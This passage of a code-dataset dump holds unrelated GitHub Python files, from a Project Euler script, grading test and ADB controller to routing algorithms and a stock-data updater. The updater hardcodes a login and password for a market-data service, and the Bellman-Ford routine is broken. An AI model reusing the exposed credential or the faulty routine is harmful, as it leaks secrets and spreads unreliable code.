-> Trimesh:\n assert sample_nums > 2, 'sample_nums too small'\n # flatten numpy elements to list will accelerate in cycle\n sample_pnts = []\n for ic in range(sample_nums):\n for ir in range(sample_nums):\n # sample_pnts.append([scale * ic / (sample_nums - 1) - scale / 2,scale * ir / (sample_nums - 1) - scale / 2, 0.])\n sample_pnts.append([-scale * ir / (sample_nums - 1) + scale / 2, -scale * ic / (sample_nums - 1) + scale / 2, 0.])\n print(sample_pnts[:3])\n # sample_pnts = [\n # [scale * ir / (sample_nums - 1) - scale / 2, -scale * ic / (sample_nums - 1) + scale / 2, 0.]\n # for ic in range(sample_nums) for ir in range(sample_nums)\n # ]\n return build_str_mesh_custom(uns_mesh, param_mesh, sample_pnts, scale)\n","repo_name":"hx-w/RenderLab","sub_path":"backend/remesh_backend/param.py","file_name":"param.py","file_ext":"py","file_size_in_byte":11103,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39892327474","text":"arr = []\n\nfor i in range(12, 999999):\n\tsum_j = 0\n\tfor j in str(i):\n\t\tsum_j += int(j) ** 5\n\tif i == sum_j:\n\t\tarr.append(i)\n\t\t\nprint(sum(arr))\n","repo_name":"MikhailGusarov/ProjectEuler","sub_path":"Problem 30.py","file_name":"Problem 30.py","file_ext":"py","file_size_in_byte":141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22980846237","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nimport util\n\nimport logistic_regression\n\ndef max_score():\n return 4\n\ndef timeout():\n return 60\n\ndef test():\n\n figures_directory = 'figures'\n\n os.makedirs(figures_directory, exist_ok=True)\n\n X, y = logistic_regression.setup_data()\n\n lambda_values = [0.1, 2]\n alpha_values = [0.5, 0.2]\n\n w0 = np.array([[7.0], [1.5]])\n num_iter = 10\n\n colors = ['green', 'darkorchid']\n\n # Solution values\n expected_w_list = [ (7.000,1.500), (-0.499,-0.628), (-0.020,0.777), (-0.139,0.180), (-0.122,0.310), (-0.121,0.315), (-0.121,0.315), (-0.121,0.315), (-0.121,0.315), (-0.121,0.315), (-0.121,0.315) ]\n\n for lamb, alpha in zip(lambda_values, alpha_values):\n\n util.plot_objective_contours(X, y, lamb, title='Newton\\'s Method vs. Gradient Descent, lambda={}'.format(lamb), colors='gray',\n show_labels=False, new_figure=True, show_figure=False, save_filename=None)\n\n gd_w_list = logistic_regression.gradient_descent(X, y, lamb, alpha, w0, num_iter)\n util.plot_optimization_path(gd_w_list, color=colors[0], label='Gradient Descent')\n\n actual_w_list = logistic_regression.newtons_method(X, y, lamb, w0, num_iter)\n\n\n util.plot_optimization_path(actual_w_list, color=colors[1], label='Newton\\'s Method')\n\n plt.xlim(-8, 8)\n plt.ylim(-8, 8)\n plt.legend(fontsize=util.get_font_size())\n\n filename = '{}/newtons_method_lambda_{:.1f}.png'.format(figures_directory, lamb)\n filename = filename.replace('.', '_', 1)\n plt.savefig(filename)\n\n\n for i in range(num_iter+1):\n assert abs(actual_w_list[i][0,0] - expected_w_list[i][0]) < 0.01 , 'Incorrect weight value found for iter={}, w[0]. Expected w={}, found w={}'.format(i, expected_w_list[i], actual_w_list[i])\n assert abs(actual_w_list[i][1,0] - expected_w_list[i][1]) < 0.01 , 'Incorrect weight value found for iter={}, w[1]. 
Expected w={}, found w={}'.format(i, expected_w_list[i], actual_w_list[i])\n        \n\n    test_score = max_score()\n    test_output = 'PASS\\n'\n\n    return test_score, test_output\n\nif __name__ == \"__main__\":\n    test()\n","repo_name":"Dahoas/ML","sub_path":"hw4_programming/hw4/test_cases/Q3/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20806726256","text":"import pandas as pd\nimport os\n\nDATA_PATH = r\".\\dane\"\nSERIES_FILES = ['series1.csv', 'series2.csv', 'series3.csv']\n\n\ndef load_all_series():\n    dfs = []\n    for idx, file in enumerate(SERIES_FILES):\n        filepath = os.path.join(DATA_PATH, file)\n        assert os.path.exists(filepath)\n        df = pd.read_csv(filepath).rename(columns={'x': f'x_series_{idx}'})\n        dfs.append(df)\n    df = pd.concat(dfs, axis=1)\n    return df\n\ndef generator(series_number): # 1 2 3 as series number\n    assert int(series_number) in [1,2,3]\n    filename = SERIES_FILES[series_number-1]\n    print(filename)\n    filepath = os.path.join(DATA_PATH,str(filename))\n    assert os.path.exists(filepath)\n    with open(filepath, 'r') as f:\n        for line in f:\n            if 'x' in line: #first line has column name \"x\".\n                pass\n            else:\n                yield float(line)\n    yield None","repo_name":"BlonskiP/PWR-Datascience-projects-exercises","sub_path":"Complex data analysis/kt-assignment-3-BlonskiP/src/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26611950802","text":"import os.path, time, sys, glob, re\n\nif __name__ != '__main__':\n\tsys.exit(0)\n\nbasepath = os.path.dirname(__file__)\nfile_name = os.path.abspath(os.path.join(basepath, sys.argv[1]))\nf = open(file_name,'r')\na = [' type=\"unfinished\"']\nlst = []\nfor line in f:\n\tfor word in a:\n\t\tif word in line:\n\t\t\tline = line.replace(word,'')\n\tlst.append(line)\nf.close()\nf = open(file_name,'w')\nfor line in lst:\n\tf.write(line)\nf.close()\n\nsys.exit(0)","repo_name":"mailru/icqdesktop.deprecated","sub_path":"gui/translations/update_mark_finished.py","file_name":"update_mark_finished.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":445,"dataset":"github-code","pt":"53"} +{"seq_id":"13272897100","text":"from collections import defaultdict\n\nclass Graph():\n    def __init__(self):\n        \"\"\"\n        self.edges is a dict of all possible next nodes\n        e.g. 
{('X', 'A'): 7, ('X', 'B'): 2, ...}\n \"\"\"\n self.edges = defaultdict(list)\n self.weights = {}\n \n def add_edge(self, from_node, to_node, weight):\n # Note: assumes edges are bi-directional\n self.edges[from_node].append(to_node)\n self.edges[to_node].append(from_node)\n self.weights[(from_node, to_node)] = weight\n self.weights[(to_node, from_node)] = weight\n\n\ndef bellmanFord(graph,inintal,end):\n #CONVERT TO PROPER DS FOR ALGORITHM\n #number of vertices\n V=len(graph.weights)\n map_dict={}\n bel_graph=[]\n for idx,key in enumerate(graph.edges.keys()):\n map_dict[key]=idx\n src=map_dict[inintal]\n dst=map_dict[end]\n path=[]\n for edge in graph.weights:\n bel_graph.append([map_dict[edge[0]], map_dict[edge[1]], edge[(0, 1)]])\n\n # init all distances from source to all as INFINITE\n dist = [float(\"Inf\")] * V\n dist[src] = 0\n # relax all edges |V|-1 times.\n for i in range(V- 1):\n # update dist value and parent index of adjacent values of picked vertex.\n # consider those which are still in queue.\n for u, v, w in bel_graph:\n if dist[u] != float(\"Inf\") and dist[u] + w < dist[v]:\n dist[v] = dist[u] + w\n path.append()\n # check for negative weight cycles. If path obtained from above step (shortest distances)\n # is shorter, there's a cycle. So quit.\n for u, v, w in bel_graph:\n if dist[u] != float(\"Inf\") and dist[u] + w < dist[v]:\n print(\"Negative Cycles !\")\n return\n #convert to normal graph\n\n # print distances\ndef dijsktra(graph, initial, end):\n # shortest paths is a dict of nodes\n # whose value is a tuple of (previous node, weight)\n shortest_paths = {initial: (None, 0)}\n current_node = initial\n visited = set()\n total_weight=0\n while current_node != end:\n visited.add(current_node)\n destinations = graph.edges[current_node]\n weight_to_current_node = shortest_paths[current_node][1]\n\n for next_node in destinations:\n weight = graph.weights[(current_node, next_node)] + weight_to_current_node\n if next_node not in shortest_paths:\n shortest_paths[next_node] = (current_node, weight)\n else:\n current_shortest_weight = shortest_paths[next_node][1]\n if current_shortest_weight > weight:\n shortest_paths[next_node] = (current_node, weight)\n \n next_destinations = {node: shortest_paths[node] for node in shortest_paths if node not in visited}\n if not next_destinations:\n return \"Route Not Possible\"\n # next node is the destination with the lowest weight\n current_node = min(next_destinations, key=lambda k: next_destinations[k][1])\n \n # Work back through destinations in shortest path\n path = []\n while current_node is not None:\n path.append(current_node)\n next_node = shortest_paths[current_node][0]\n current_node = next_node\n # Reverse path\n path = path[::-1]\n for idx in range(len(path)-1):\n total_weight+=graph.weights[(path[idx],path[idx+1])]\n return path,total_weight","repo_name":"Ryuodan/Network-Routering-Simulation","sub_path":"algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17244084985","text":"import logging\nimport socket\nimport numpy as np\nimport cv2\n\nimport config\nfrom ppadb.client import Client as AdbClient\n\nlogger = logging.getLogger(__name__)\n\n\nclass ADBSession():\n def __init__(self, server, serial=None):\n self.server = server\n self.client = AdbClient(host=self.server[0], port=self.server[1])\n\n if self.client is not None:\n logger.debug(f\"Create to adb client succssfully! 
{self.server[0]}:{self.server[1]}\")\n\n devices = self.client.devices()\n if len(devices) > 0:\n self.device = devices[0]\n logger.debug(f\"{len(devices)} devices found! Connect the first one: {self.device.serial}\")\n else:\n logger.error(\"No device found\")\n\n def shell_raw(self, cmd):\n # overwrite the shell function so that it returns raw byte instead of utf-8 decoded\n conn = self.device.create_connection(timeout=None)\n cmd = \"exec:{}\".format(cmd)\n conn.send(cmd)\n result = conn.read_all()\n conn.close()\n return result\n\n def get_screen_size(self):\n image = self.get_screenshot()\n self.width, self.height, self.channel = image.shape\n logger.debug(f\"Screen size is ({self.height}, {self.width}, {self.channel})\")\n\n def exec_cmd(self, cmd):\n \"\"\" run command in adb shell \"\"\"\n return self.device.shell(cmd)\n\n def list_devices(self):\n devices = self.client.devices()\n for device in devices:\n print(device.serial)\n\n def get_screenshot(self):\n # take screenshot and convert to cv2 image\n data = self.shell_raw(\"screencap -p\")\n np_image = np.array(data)\n image = cv2.imdecode(np_image, 1)\n logger.debug(f\"Get screenshot of size {image.shape}\")\n return image\n\n def tap_screen(self, coord): # coord[0] = x, coord[1] = y\n command = f\"input tap {coord[0]} {coord[1]}\"\n self.exec_cmd(command)\n logger.debug(f\"Tap screen: ({coord[0]},{coord[1]})\")\n \n def touch_swipe(self, origin, movement, duration=None):\n x1, y1, x2, y2 = origin[0], origin[1], origin[0] + movement[0], origin[1] + movement[1]\n logger.debug(f\"swipe from:({x1},{y1}); offset: dX:{movement[0]}, dy:{movement[1]}\")\n command = \"input swipe {} {} {} {} \".format(x1, y1, x2, y2)\n if duration is not None:\n command += str(int(duration))\n self.exec_cmd(command)","repo_name":"Gavincrz/arknights_remote","sub_path":"localPC/connector/ADBSession.py","file_name":"ADBSession.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29355234218","text":"import os\nimport pandas as pd\n\n_file_name = os.environ.get('FILE_NAME', '../../../data/conversations_prod.xlsx')\n\nTIME_CHAT_GPT_USED = 1677063600\n\nclass GlobalStore:\n def __init__(self):\n df = pd.read_excel(_file_name)\n df = df[df.testphase != 0] # Testphase 0 is ignored because it consists mainly of test conversations\n df.reset_index(drop=True, inplace=True)\n self.df = df\n\n def get_data(self, filter_value):\n if filter_value == 0:\n return self.df\n else:\n df_filtered = self.df[self.df.testphase == filter_value]\n df_filtered.reset_index(drop=True, inplace=True)\n return df_filtered\n\n def set_data(self, new_df):\n self.df = new_df\n\n\nglobal_store = GlobalStore()\n","repo_name":"climate-change-bot/analytics","sub_path":"src/climate_change_bot/analytics/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72593468008","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('home/create_post/', views.create_post, name=\"create_post\"),\n path('', views.home, name='home'),\n path('home/', views.home, name='home'),\n path('post//', views.post_detail, name=\"post_detail\"),\n path(\"post//delete\", views.PostDelete.as_view(), name=\"posts_delete\"),\n path('songs/create', views.SongCreate.as_view(), name=\"songs_create\"),\n path(\"songs//\", views.song_detail, name=\"songs_detail\"),\n path(\"songs//update\", views.SongUpdate.as_view(), name=\"songs_update\"),\n path(\"songs//delete\", views.SongDelete.as_view(), name=\"songs_delete\"),\n path(\"songs//assoc_gear//\", views.assoc_gear, name=\"assoc_gear\"),\n path(\"songs//unassoc_gear//\", views.unassoc_gear, name=\"unassoc_gear\"),\n path('songs', views.songs_index, name='index'),\n path(\"gear//\", views.GearDetail.as_view(), name=\"gears_detail\"),\n path(\"gear/create\", views.GearCreate.as_view(), name=\"gears_create\"),\n path(\"gear/\", views.GearList.as_view(), name=\"gears_index\"),\n path('accounts/signup/', views.signup, name='signup'),\n]\n","repo_name":"ShayRdev/Sampology","sub_path":"main_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11902027371","text":"import tensorflow as tf\r\nimport os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\nsession = tf.Session()\r\n'''\r\n#Constants\r\ncons_1 = tf.constant(value = [[1.0,2.0]],\r\n dtype = tf.float32,\r\n name = 'cons_1')\r\n\r\ncons_2 = tf.constant(value = [[3.0,4.0]],\r\n dtype = tf.float32,\r\n name = 'cons_1')\r\n\r\nsession = tf.Session()\r\nprint(session.run(cons_1),session.run(cons_2))\r\n\r\n\r\n#Variables\r\nvar_1 = tf.Variable(initial_value=[1.0],\r\n trainable=True,\r\n dtype=tf.float32) # if true model can change its value if False then its can't\r\n\r\ninit = tf.global_variables_initializer() # we have to call this function to initialize the variable value\r\nsession.run(init)\r\nprint(session.run(var_1))\r\n\r\nvar_2 = var_1.assign(value=[2.0])\r\nprint(session.run(var_2))\r\n\r\n# Placeholder\r\nplaceholder_1 = tf.placeholder(dtype=tf.float32,\r\n shape = (1,4),\r\n name='placeholder_1')\r\n\r\nprint(placeholder_1)\r\nprint(session.run(fetches=placeholder_1,feed_dict={placeholder_1:[[1.0,2.0,3.0,4.0]]}))'''\r\n\r\n# Operation Node\r\ncons_1 = tf.constant(value=[1.0])\r\ncons_2 = tf.constant(value=[2.0])\r\nplaceholder_1 = tf.placeholder(dtype=tf.float32)\r\n#result = cons_1 + cons_2\r\nresult = tf.add(x=placeholder_1,y=cons_2,name='result')\r\n#print(session.run(fetches=result,feed_dict={placeholder_1:[2.0]}))\r\n\r\n# Y = m*x + c\r\n\r\nm = tf.constant(value=[2.0],\r\n dtype=tf.float32)\r\nc = tf.constant(value=[3.0],\r\n dtype=tf.float32)\r\nx = tf.placeholder(dtype=tf.float32)\r\n\r\n#y = m*x + c\r\n\r\nmult = tf.multiply(x=m,y=x,name='multiply')\r\n\r\ny = tf.add(x=mult,y=c)\r\n\r\nprint(session.run(fetches=y,feed_dict={x:[3.0]}))\r\n\r\n","repo_name":"Arup276/365Days_Challenge","sub_path":"42_Day/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70092608810","text":"import os.path\nimport app_state\nimport numpy as np\nfrom pydub.playback import play\nfrom pydub import AudioSegment\nfrom torch.cuda import is_available\n\nAPP_NAME = \"WeeaBlind\"\ntest_video_name = \"./output/download.webm\"\ndefault_sample_path = 
\"./output/sample.wav\"\ntest_start_time = 94\ntest_end_time = 1324\ngpu_detected = is_available()\n\ndef create_output_dir():\n\tpath = './output/files'\n\tif not os.path.exists(path):\n\t\tos.makedirs(path)\n\ndef get_output_path(input, suffix, prefix='', path=''):\n\tfilename = os.path.basename(input)\n\tfilename_without_extension = os.path.splitext(filename)[0]\n\treturn os.path.join(os.path.dirname(os.path.abspath(__file__)), 'output', path, f\"{prefix}{filename_without_extension}{suffix}\")\n\ndef timecode_to_seconds(timecode):\n\tparts = list(map(float, timecode.split(':')))\n\tseconds = parts[-1]\n\tif len(parts) > 1:\n\t\tseconds += parts[-2] * 60\n\tif len(parts) > 2:\n\t\tseconds += parts[-3] * 3600\n\treturn seconds\n\ndef seconds_to_timecode(seconds):\n\thours = int(seconds // 3600)\n\tminutes = int((seconds % 3600) // 60)\n\tseconds = seconds % 60\n\ttimecode = \"\"\n\tif hours:\n\t\ttimecode += f\"{hours}:\"\n\tif minutes:\n\t\ttimecode += f\"{minutes}:\" \n\ttimecode = f\"{timecode}{seconds:05.2f}\"\n\treturn timecode\n\n# Finds the closest element in an arry to the given value\ndef find_nearest(array, value):\n\treturn (np.abs(np.asarray(array) - value)).argmin()\n\ndef sampleVoice(text, output=default_sample_path):\n\tplay(AudioSegment.from_file(app_state.sample_speaker.speak(text, output)))\n\nsnippet_export_path = get_output_path(\"video_snippet\", \"wav\")","repo_name":"lonelyuniverse/Itadub","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"211817366","text":"# coding=utf8\r\nimport os\r\nimport time\r\nimport datetime as dt\r\n\r\nimport scipy.io as scio\r\nimport h5py\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nfrom gmsdk import md\r\nfrom WindPy import w\r\n\r\n\r\n\r\n\r\ndef read_cell(h5fl,field):\r\n return [''.join([chr(c) for c in h5fl[cl]]) for cl in h5fl[field][0]]\r\n\r\ndef updatePal(palPath=None):\r\n start = time.time()\r\n\r\n md.init('18201141877', 'Wqxl7309')\r\n if not w.isconnected():\r\n w.start()\r\n\r\n palPath = r'E:\\bqfcts\\bqfcts\\data\\Paltest' if palPath is None else palPath\r\n tempFilePath = os.path.join(palPath,'temp_files')\r\n if not os.path.exists(tempFilePath):\r\n os.mkdir(tempFilePath)\r\n matName = 'data_20150701_now.mat'\r\n\r\n savedPal = h5py.File(os.path.join(palPath,matName))\r\n # print(read_cell(savedPal,'sec_names'))\r\n nextTrd = dt.datetime.strptime(str(int(savedPal['nexttrd'][0][0])),'%Y%m%d')\r\n nextTrdStr = nextTrd.strftime('%Y-%m-%d')\r\n updateTime = dt.datetime(nextTrd.year,nextTrd.month,nextTrd.day,15,30,0)\r\n if updateTime > dt.datetime.now():\r\n print('not update time yet')\r\n return\r\n else:\r\n availableDateStr = md.get_last_dailybars('SHSE.000001')[0].strtime[:10]\r\n if int(availableDateStr.replace('-','')) <= int(nextTrdStr.replace('-','')):\r\n print('new data not avaliable yet')\r\n return\r\n else:\r\n print('will update from {0} to {1}'.format(nextTrdStr,availableDateStr))\r\n\r\n betweenDays = [tdt.strtime[:10] for tdt in md.get_calendar('SHSE',nextTrdStr,availableDateStr)]\r\n if nextTrdStr!=availableDateStr: # 避免同一日期重复\r\n betweenDays.append(availableDateStr)\r\n betweenDaysNumber = [int(tdt.replace('-','')) for tdt in betweenDays]\r\n newDateNum = len(betweenDaysNumber)\r\n\r\n # 更新前 先备份数据\r\n backupPath = os.path.join(palPath,'backup')\r\n cpResult = os.system(r'COPY {0} {1} 
/Y'.format(os.path.join(palPath,matName),os.path.join(backupPath,matName)))\r\n assert cpResult==0,'backup failed'\r\n\r\n gmDateFmt = 'yyyy-mm-dd'\r\n\r\n # update indice\r\n indiceNames = ['sh','hs300','zz500','sz50']\r\n indiceCodes = ['000001','000300','000905','000016']\r\n symbols = ','.join(['SHSE.{}'.format(sbl) for sbl in indiceCodes])\r\n indiceBars = md.get_dailybars(symbols,nextTrdStr,availableDateStr)\r\n for dumi,idx in enumerate(indiceNames):\r\n bars = indiceBars[dumi::4]\r\n idxret = np.array([bar.close for bar in bars])/np.array([bar.pre_close for bar in bars]) - 1\r\n idxArray = np.array([betweenDaysNumber,\r\n [bar.open for bar in bars],\r\n [bar.high for bar in bars],\r\n [bar.low for bar in bars],\r\n [bar.close for bar in bars],\r\n [bar.volume for bar in bars],\r\n [bar.amount for bar in bars],\r\n idxret\r\n ])\r\n # newIndex = np.column_stack([savedPal['index_{}'.format(idx)][:], idxArray])\r\n pd.DataFrame(np.transpose(idxArray)).to_csv(os.path.join(tempFilePath,'index_{}.csv'.format(idx)),index=False,header=False)\r\n\r\n # update stock info\r\n nCut = savedPal['N_cut'][0][0] # 6000\r\n nEnd = savedPal['N_end'][0][0] # last end date id ex.6732\r\n stockNames = read_cell(savedPal, 'stockname')\r\n savedStkcdsGM = ['.'.join([stk[-2:]+'SE',stk[:6]]) for stk in stockNames]\r\n savedStkNum = len(stockNames)\r\n listedStkcdsWind = w.wset('sectorconstituent','date={};sectorid=a001010100000000'.format(availableDateStr)).Data[1]\r\n newStkcdsWind = sorted(list(set(listedStkcdsWind) - set(stockNames)))\r\n if newStkcdsWind:\r\n stockNames.extend( newStkcdsWind )\r\n newStkIpos = [int(tdt.strftime('%Y%m%d')) for tdt in w.wss(newStkcdsWind, 'ipo_date').Data[0]]\r\n newIpoIds = [(w.tdayscount(nextTrd,str(ipo)).Data[0][0]+nEnd) for ipo in newStkIpos]\r\n newStockip = pd.DataFrame([[int(newStkcdsWind[dumi][:6]), newStkIpos[dumi], newIpoIds[dumi],0,0,0,0,0] for dumi in range(len(newStkcdsWind))])\r\n newStockip.to_csv( os.path.join(tempFilePath,'stockip.csv'),index=False,header=False )\r\n else:\r\n pd.DataFrame([]).to_csv(os.path.join(tempFilePath, 'stockip.csv'), index=False, header=False)\r\n newStkcdsGm = ['.'.join([stk[-2:]+'SE',stk[:6]]) for stk in newStkcdsWind]\r\n allStkcdsGM = savedStkcdsGM + newStkcdsGm # 全体股票包含已退市 与pal行数相同\r\n # allSecNames = pd.DataFrame(w.wss(stockNames,'sec_name').Data[0])\r\n allInstruments = md.get_instruments('SZSE', 1, 0) + md.get_instruments('SHSE', 1, 0)\r\n allInstrumentsDF = pd.DataFrame([[inds.symbol, inds.sec_name] for inds in allInstruments],columns=['symbol','sec_name']).set_index('symbol')\r\n allSecNames = allInstrumentsDF.loc[allStkcdsGM,'sec_name']\r\n allSecNames.to_csv( os.path.join(tempFilePath, 'sec_names.csv'), index=False, header=False )\r\n pd.DataFrame(newStkcdsWind).to_csv( os.path.join(tempFilePath, 'stockname.csv'), index=False, header=False )\r\n\r\n # update trade info\r\n pages = ['date','open','high','low','close','volume','amount','pctchg','flow_a_share','total_share','adjfct','adjprc','isst']\r\n newPal = {}\r\n for page in pages:\r\n newPal[page] = pd.DataFrame(np.zeros([len(allStkcdsGM), newDateNum]),index=allStkcdsGM,columns=betweenDays)\r\n lastPal = pd.DataFrame(savedPal['Pal'][:,-1,:],columns=savedStkcdsGM)\r\n barsDaily = md.get_dailybars(','.join(allStkcdsGM), nextTrdStr, availableDateStr)\r\n for bar in barsDaily:\r\n tdt = bar.strtime[:10]\r\n stk = '.'.join([bar.exchange,bar.sec_id])\r\n newPal['date'].loc[stk, tdt] = int(tdt.replace('-',''))\r\n newPal['open'].loc[stk, tdt] = bar.open\r\n 
newPal['high'].loc[stk, tdt] = bar.high\r\n newPal['low'].loc[stk, tdt] = bar.low\r\n newPal['close'].loc[stk, tdt] = bar.close\r\n newPal['volume'].loc[stk, tdt] = bar.volume\r\n newPal['amount'].loc[stk, tdt] = bar.amount\r\n newPal['pctchg'].loc[stk, tdt] = bar.close/bar.pre_close - 1\r\n # 计算自算复权因子 : 前一日收盘价*(1+当日收益率)/当日收盘价 s.t. (当日收盘价*当日复权因子)/前一日收盘价 = 1+ret\r\n # 若当日没有交易 : 沿用前一日 复权因子 循环外处理\r\n # 若前一日没有交易 前一日收盘价 特殊处理:\r\n # 当日有交易 : 取停牌前最后一个交易日的 收盘价\r\n # 当日没交易 没有退市 : 沿用前一日复权因子 循环外处理\r\n # 当日没交易 已经退市 : 沿用前一日复权因子 循环外处理\r\n # 若新股上市第一天 : 复权因子为1\r\n if stk in newStkcdsGm:\r\n newPal['adjfct'].loc[stk, tdt] = 1\r\n else:\r\n noTrdLast = (lastPal.loc[0, stk] == 0) if tdt == nextTrdStr else (newPal['date'].loc[stk, betweenDays[betweenDays.index(tdt) - 1]] == 0)\r\n if noTrdLast: # 前一日没交易 今日有交易(否则不应出现在bars里面)\r\n lastBar = md.get_last_n_dailybars(stk, 2, end_time=tdt)[-1]\r\n newPal['adjfct'].loc[stk, tdt] = lastPal.loc[15, stk] * lastBar.close * (1 + newPal['pctchg'].loc[stk, tdt]) / bar.close\r\n else:\r\n preClose = lastPal.loc[4,stk] if tdt==nextTrdStr else newPal['close'].loc[stk,betweenDays[betweenDays.index(tdt)-1]]\r\n newPal['adjfct'].loc[stk, tdt] = lastPal.loc[15, stk] * preClose * (1 + newPal['pctchg'].loc[stk, tdt]) / bar.close\r\n for dumi,tdt in enumerate(betweenDays):\r\n idx = newPal['adjfct'].loc[:,tdt]==0\r\n idx = idx.values\r\n if tdt==nextTrdStr:\r\n newPal['adjfct'].loc[idx[:savedStkNum], tdt] = lastPal.loc[15,:].values[idx[:savedStkNum]]\r\n else:\r\n newPal['adjfct'].loc[idx, tdt] = newPal['adjfct'].loc[idx, betweenDays[dumi-1]]\r\n newPal['adjprc'] = newPal['adjfct']*newPal['close']\r\n\r\n shareBar = md.get_share_index(','.join(allStkcdsGM), nextTrdStr, availableDateStr)\r\n for bar in shareBar:\r\n tdt = bar.pub_date\r\n stk = bar.symbol\r\n newPal['flow_a_share'].loc[stk, tdt] = bar.flow_a_share\r\n newPal['total_share'].loc[stk, tdt] = bar.total_share\r\n\r\n isST = np.array([int('ST' in sn) for sn in allSecNames.values])\r\n newPal['isst'] = pd.DataFrame(np.repeat(np.reshape(isST,(isST.shape[0],1)),len(betweenDays),axis=1), index=allStkcdsGM, columns=betweenDays)\r\n\r\n for page in newPal:\r\n newPal[page].to_csv(os.path.join(tempFilePath,'{}.csv'.format(page)),index=False,header=False )\r\n\r\n print('Pal temp files update finished with {0} stocks and {1} days in {2} seconds '.format(len(newStkcdsWind),len(betweenDays),time.time() - start))\r\n\r\nif __name__=='__main__':\r\n updatePal()\r\n","repo_name":"wqxl309/update_pal","sub_path":"updatePal.py","file_name":"updatePal.py","file_ext":"py","file_size_in_byte":8869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73782852648","text":"import asm\nimport re\n\ndef parse(f):\n \"\"\"Parse the contents of file f\"\"\"\n module = asm.Module(f)\n parse_asm(f, module)\n return module\n\ndef parse_asm(fname, module):\n \"\"\"Parse an assembly file and populate module\"\"\"\n with open(fname) as f:\n for line in f:\n # start of a new function\n m_fun = re.match(\"(?P[0-9_a-z]+):\", line, re.I)\n if m_fun:\n name = m_fun.group('fun')\n fun = asm.Function(name)\n module.functions.append(fun)\n next\n\n # instruction\n m_inst = re.match(\"\\s+(?P[a-z][a-z0-9.]+)\\s+\", line, re.I)\n if m_inst:\n fun.instructions.append(asm.Instruction(*lex_inst(line)))\n next\n\ndef lex_inst(inst):\n inst = inst.strip()\n ob = inst.find(\"[\")\n cb = inst.find(\"]\")\n if ob != -1 and cb != -1:\n inst = inst[:ob] + inst[ob:cb].replace(\",\", \"|\") + inst[cb:]\n\n (opcode, 
operands) = inst.split(maxsplit=1)\n    operands = operands.split(\",\")\n    operands = [op.replace(\"|\", \",\") for op in operands]  # restore the commas that were protected inside brackets\n\n    return (opcode, operands)\n\n","repo_name":"dmpots/asmdiff","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"33997079429","text":"#!/usr/bin/env python3\n# https://atcoder.jp/contests/abc229/tasks/abc229_D?lang=ja\n\nimport bisect\nimport heapq\nimport math\nimport sys\nfrom collections import defaultdict, deque\nfrom itertools import (accumulate, groupby, permutations, combinations,\n                       combinations_with_replacement, product)\nfrom typing import *\ninput = sys.stdin.buffer.readline\n\n\nT = TypeVar('T')\nD = TypeVar('D')\n\n\ndef chmax(a: T, b: T) -> Tuple[T, bool]:\n    if (a < b):\n        a = b  # update a with b\n        return (a, True)\n    return (a, False)\n\n\ndef chmin(a: T, b: T) -> Tuple[T, bool]:\n    if (a > b):\n        a = b  # update a with b\n        return (a, True)\n    return (a, False)\n\n\ndef solve(S: str, K: int):\n    n = len(S)\n    a = [int(si == '.') for si in S]\n    ans = 0\n    r, sum_ = 0, 0\n    for l in range(n):\n        # check whether the next r still fits\n        while ((r < n) and (sum_ + a[r] <= K)):\n            # it fits, so take it\n            sum_ += a[r]\n            # move on to the next r\n            r += 1\n        # reached the first r that no longer fits\n        ans, _ = chmax(ans, r-l)  # update the answer with the window [l, r)\n        sum_ -= a[l]  # prepare for the next l\n    print(ans)\n\n# def solve(S: str, K: int):\n#     # cnt[r] - cnt[l] gives the number of '.' in s[l,r)\n#     cnt = [0]*(len(S)+1)\n#     for i in range(len(S)):\n#         if S[i] == '.':\n#             cnt[i+1] = cnt[i] + 1\n#         else:\n#             cnt[i+1] = cnt[i]\n\n#     r = 0\n#     ans = 0\n#     for l in range(len(S)):\n#         while (r < len(S)) and (cnt[r+1] - cnt[l] <= K):\n#             r += 1\n#         # while [l, r) holds at most K '.', r-l is the window length\n#         ans = max(r - l, ans)\n#     print(ans)\n\n\ndef main():\n    def iterate_tokens():\n        for line in sys.stdin:\n            for word in line.split():\n                yield word\n    tokens = iterate_tokens()\n    S = next(tokens)  # type: str\n    K = int(next(tokens))  # type: int\n    solve(S, K)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"come2ry/kyopro","sub_path":"Contests/abc229/D/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
